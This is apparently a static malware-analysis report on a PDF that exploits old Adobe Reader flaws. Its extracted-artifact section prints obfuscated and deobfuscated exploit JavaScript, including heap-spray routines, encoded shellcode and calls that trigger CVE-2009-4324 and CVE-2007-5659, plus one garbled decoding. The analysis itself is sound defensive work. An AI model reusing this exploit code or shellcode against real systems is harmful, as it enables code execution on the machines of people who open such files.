Malicious PDF — malware analysis report

Static analysis result for SHA-256 5fe47da9a62cf435…

MALICIOUS

PDF

7.3 KB
MD5: 551a652768dcc455dcb710ba13da9c8d SHA-1: fcc5e5b0ec0d77bbe0963b63c492f3c4856c2535 SHA-256: 5fe47da9a62cf435cc94335b8469e9ad8441041e14e27a253715533f37fe8297
476 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains obfuscated JavaScript that exploits multiple known vulnerabilities in Adobe Reader (CVE-2007-5659, CVE-2009-4324, CVE-2009-0927). The script is designed to execute arbitrary code, as indicated by the 'Js.Exploit.Shellcode-18' ClamAV signature and the ML classifier flagging it as highly malicious. The primary function of the script appears to be downloading and executing a second-stage payload, though the exact URL is obfuscated.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0039_000.js
bd82ff54b6772016bffee3bce1d2f3094985540530f3bd63328afec82b13e48c		 pdf-javascript-stream PDF /JS object 39 at offset 0x16F 28112 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
asmtnX2g86="PIHFDN8=[193,210,201,196,211,206,200,201,135,193,206,223,248,206,2"; asmtnX2g86+= "11,143,222,198,213,212,215,139,203,194,201,142,220,208,20"; asmtnX2g86+= "7,206,203,194,143,222,198,213,212,215,137,203,194,201,192"; asmtnX2g86+= ",211,207,141,149,155,203,194,201,142,220,222,198,213,212,"; asmtnX2g86+= "215,140,154,222,198,213,212,215,156,218,222,198,213,212,2"; asmtnX2g86+= "15,154,222,198,213,212,215,137,212,210,197,212,211,213,20"; asmtnX2g86+= "6,201,192,143,151,139,203,194,201,136,149,142,156,213,194"; asmtnX2g86+= ",211,210,213,201,135,222,198,213,212,215,156,218,170,173,"; asmtnX2g86+= "193,210,201,196,211,206,200,201,135,201,194,208,215,203,1"; asmtnX2g86+= "98,222,194,213,143,142,220,170,173,209,198,213,135,212,20"; asmtnX2g86+= "7,194,203,203,196,200,195,194,135,154,135,210,201,194,212"; asmtnX2g86+= ",196,198,215,194,143,133,130,210,150,150,226,229,130,210,"; asmtnX2g86+= "147,229,146,229,130,210,228,158,148,148,130,210,159,150,1"; asmtnX2g86+= "45,145,130,210,230,225,228,158,130,210,159,151,151,150,13"; asmtnX2g86+= "0,210,151,229,148,147,130,210,226,149,230,145,130,210,226"; asmtnX2g86+= ",229,225,230,130,210,226,159,151,146,130,210,225,225,226,"; asmtnX2g86+= "230,130,210,225,225,225,225,130,210,144,228,147,225,130,2"; asmtnX2g86+= "10,230,145,230,145,130,210,225,158,230,145,130,210,151,14"; asmtnX2g86+= "4,228,149,130,210,230,145,158,145,130,210,230,145,230,145"; asmtnX2g86+= ",130,210,226,145,149,227,130,210,149,227,230,230,130,210,"; asmtnX2g86+= "229,230,227,145,130,210,149,227,151,229,130,210,230,226,2"; asmtnX2g86+= "28,226,130,210,227,145,149,227,130,210,149,227,159,145,13"; asmtnX2g86+= "0,210,149,145,230,145,130,210,228,227,158,159,130,210,146"; asmtnX2g86+= ",146,227,148,130,210,226,151,226,151,130,210,158,159,149,"; asmtnX2g86+= "145,130,210,227,148,228,148,130,210,226,151,147,230,130,2"; asmtnX2g86+= "10,149,145,226,151,130,210,227,147,158,159,130,210,146,15"; asmtnX2g86+= "0,227,148,130,210,226,151,226,151,130,210,158,159,149,145"; asmtnX2g86+= ",130,210,227,148,228,159,130,210,149,227,146,145,130,210,"; asmtnX2g86+= "228,228,146,150,130,210,225,225,230,146,130,210,225,227,1"; asmtnX2g86+= "47,226,130,210,230,145,230,145,130,210,147,147,230,145,13"; asmtnX2g86+= "0,210,228,226,146,225,130,210,228,159,228,158,130,210,230"; asmtnX2g86+= ",145,230,145,130,210,227,148,228,226,130,210,228,230,227,"; asmtnX2g86+= "147,130,210,225,149,228,229,130,210,229,151,146,158,130,2"; asmtnX2g86+= "10,147,226,149,227,130,210,226,148,147,226,130,210,230,14"; asmtnX2g86+= "5,230,145,130,210,228,226,230,145,130,210,158,146,228,230"; asmtnX2g86+= ",130,210,230,145,158,147,130,210,227,146,228,226,130,210,"; asmtnX2g86+= "228,148,228,226,130,210,225,149,228,230,130,210,229,151,1"; asmtnX2g86+= "46,158,130,210,147,226,149,227,130,210,158,144,147,226,13"; asmtnX2g86+= "0,210,230,145,230,145,130,210,149,146,230,145,130,210,226"; asmtnX2g86+= ",145,147,230,130,210,144,230,149,227,130,210,228,228,225,"; asmtnX2g86+= "146,130,210,146,158,226,145,130,210,230,149,225,151,130,2"; asmtnX2g86+= "10,230,149,145,150,130,210,228,144,230,146,130,210,228,14"; asmtnX2g86+= "8,159,159,130,210,228,151,227,226,130,210,226,149,145,150"; asmtnX2g86+= ",130,210,230,149,230,146,130,210,230,145,228,148,130,210,"; asmtnX2g86+= "145,145,158,146,130,210,225,145,225,145,130,210,225,150,2"; asmtnX2g86+= "25,146,130,210,146,158,225,145,130,210,230,230,225,151,13"; asmtnX2g86+= "0,210,144,230,149,227,130,210,225,145,225,145,130,210,225"; asmtnX2g86+= ",146,225,145,130,210,225,145,225,145,130,210,225,151,146,"; asmtnX2g86+= "158,130,210,146,158,229,145,130,210,230,226,225,151,130,2"; asmtnX2g86+= "10,225,151,225,144,130,210,227,148,149,227,130,210,149,22"; asmtnX2g86+= "7,158,230,130,210,159,159,227,149,130,210,230,146,227,226"; asmtnX2g86+= ",130,210,225,151,146,148,130,210,227,151,149,227,130,210,"; asmtnX2g86+= "230,146,159,145,130,210,158,146,146,148,130,210,226,225,1"; asmtnX2g86+= "45,225,130,210,151,229,226,144,130,210,145,148,230,146,13"; asmtnX2g86+= "0,210,144,227,158,146,130,210,150,159,230,158,130,210,158"; asmtnX2g86+= ",228,
... (truncated)
legacy_pdfkit_stage_000.js
5b9713b24ca2f3ad63839b771c3e3c53bdc066d7fc4958eaf906da5deae096f6		 deobfuscated-js numeric array XOR decoded JavaScript at offset 0x16F 5344 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 9 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%uC7CE%uDFD6%uCE90%uCA89%uCFD3%uC0C2%uD5C4%uDEC8%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC8F9%uD1C3%uCAF6%uDFC7%uD4C3%uC080%u9BCE%u00A6");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}

function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD789%uD5D6%u94CD%uD488%u89D3%uC7CE%uDFD6%uCE90%uCA89%uCFD3%uC0C2%uD5C4%uDEC8%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC3F9%uC7CB%uCACF%uC080%u9BCE%u00A6");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}

function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3
... (truncated)
legacy_pdfkit_stage_001.js
1498a25280444fc9e04889a0622422b714ff4dc559d344fcc836b48a36a0ed2e		 deobfuscated-js numPages XOR decoded JavaScript at offset 0x16F 5344 bytes
Preview script
First 1,000 lines of the extracted script
FUNCTION FIX IT YARSP LEN	[WHILE YARSP LENGTH
  LEN	[YARSP  YARSP ]YARSP YARSP SUBSTRING   LEN  	 RETURN YARSP ]-*FUNCTION NEWPLAYER 	[-*VAR SHELLCODE   UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  U  cd Ud    U  d  Uc ce Udfd  Uce   Uca   Ucfd  Uc c  Ud c  Udec  Ud    Ud ce Ud    Ucad  Ud  b Uc c  Uc f  Ud c  Ucaf  Udfc  Ud c  Uc    U bce U  a  	 -*VAR BLOCK   UNESCAPE   U C C U C C 	 -*VAR gdAGAcUYnFrsfZAszlo   UNESCAPE   U C C U C C U C C U C C U C C U C C U C C U C C U   E U     U     U   F U A E U D   U B   U B   U     U D   U     U   B U     U   A U   F U A E U   E U A D U     U     U     U     U     U     U C   U   D U     U     	 -*WHILE BLOCK LENGTH         	 BLOCK  BLOCK -*BLOCK BLOCK SUBSTRING         
 SHELLCODE LENGTH	 -*MEMORY NEW aRRAY 	 FOR I   I  X     I  	 [MEMORY{I}  BLOCK   SHELLCODE ]-*UTIL PRINTD  RLPpPJtxxiNCuHWAGcZCUhFMKZoBbszdgnDc   NEW dATE 		 -*UTIL PRINTD  sOTsXnqVmQknJjKixIOkLMFzyFMIpgGgnnkN   NEW dATE 		 -*TRY [THIS MEDIA NEWpLAYER NULL	 ] CATCH E	 []-*UTIL PRINTD gdAGAcUYnFrsfZAszlo  NEW dATE 		 ]-*-*FUNCTION COLLAB EMAIL 	[VAR SHELLCODE UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud b  Uf    Uf  d Ua    Uc  b Uaa d U ded Ubaf  U ba  Ua  d Ua  d U d   Ufff  U e   U     U     Ue    U aa  U c   Ufd c U ed  Ud    Ubc   Ud    U df  Ubd   Ud ce Ud d  U   c Ud    Ud d  U  cd Ud    U  d  Uc ce Udfd  Uce   Uca   Ucfd  Uc c  Ud c  Udec  Ud    Ud ce Ud    Ucad  Ud  b Uc c  Uc f  Uc cb Ucacf Uc    U bce U  a  	 VAR MEM ARRAY NEW aRRAY 	 VAR CC  X C C C C VAR ADDR  X       VAR SC LEN SHELLCODE LENGTH
  VAR LEN ADDR
 SC LEN  X  	 VAR YARSP UNESCAPE   U     U     	 YARSP FIX IT YARSP LEN	 VAR COUNT   CC
 X      	 ADDR FOR VAR COUNT   COUNT COUNT  COUNT  	[MEM ARRAY{COUNT} YARSP SHELLCODE ]-*VAR OVERFLOW UNESCAPE   U C C U C C 	 WHILE OVERFLOW LENGTH      	[OVERFLOW  OVERFLOW ]-*THIS COLLABsTORE cOLLAB COLLECTeMAILiNFO [SUBJ    MSG OVERFLOW]	 ]-*-*FUNCTION COLLAB GETICON 	[IF APP DOC cOLLAB GETiCON	[VAR ARRY NEW aRRAY 	 VAR VVPETHYA UNESCAPE   U  eb U b b Uc    U     Uafc  U     U b   Ue a  Uebfa Ue    Uffea Uffff U c f Ua a  Uf a  U  c  Ua    Ua a  Ue  d U daa Ubad  U d b Uaece Ud  d U d   U  a  Ucd   U  d  Ue e  U     Ud c  Ue  a U  e  Ud    U  d  Ue e  U     Ud c  U d   Ucc   Uffa  Ufd e Ua a  U  a  Uce f Uc c  Ua a  Ud ce Ucad  Uf cb Ub    U e d Ue  e Ua a  Ucea  U  ca Ua    Ud ce Uc ce Uf ca Ub    U e d U   e Ua a  U  a  Ue  a U a d Uccf  U  e  Ua f  Ua    Uc a  Uc    Uc de Ue    Ua a  Ua c  U     Uf f  Uf f  U  f  Uaaf  U a d Uf f  Uf f  Uf f  Uf    U  b  Uaef  Uf f  Ud  d U d a U  d  Ua de Uf    Ud  d Ua    U     Uef f U be  U  a  U d   U  a  U cb  Ud    U  ae Uab d U ca  U de  U d   Ud 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.